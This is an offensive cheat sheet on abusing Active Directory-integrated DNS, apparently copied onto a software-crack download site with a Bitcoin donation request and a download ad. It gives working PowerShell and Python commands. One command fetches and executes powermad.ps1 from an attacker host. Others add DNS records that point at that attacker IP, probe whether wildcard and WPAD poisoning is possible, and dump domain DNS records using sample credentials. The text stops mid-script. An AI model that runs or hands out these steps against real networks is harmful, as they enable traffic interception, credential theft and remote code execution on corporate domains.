Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

ADIDNS Abuse

groot5t1

ADIDNS Abuse

Active Directory Integrated DNS

0. Load Tools

PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")

1. Check if You Can Modify (Add) AD DNS Names

PS > Get-ADIDNSZone -Credential $cred -Verbose
PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}

2. Create and Configure a New DNS Name

PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose

3. Check and Resolve the New DNS Object

PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01

4. Clean Up

PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose

ADIDNS Poisoning (Wildcard Injection)

Check If You Can Perform the Attack

$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local

Tools

adidnsdump

adidnsdump GitHub Repository

$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv

Check with ldapsearch

$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name

Dump Records from a Child Domain

# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r

# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r

Merge IPs into /24 CIDRs with Python

#!/usr/bin/env python3

"""
Merge standalone IPs into CIDRs.

Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""

import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
    for line in fd:
        ip = line.rstrip('\n')
        try:
            iplst.append(netaddr.IPNetwork(f'{ip}/24'))

📱

Download Now—Top Software, No Cost!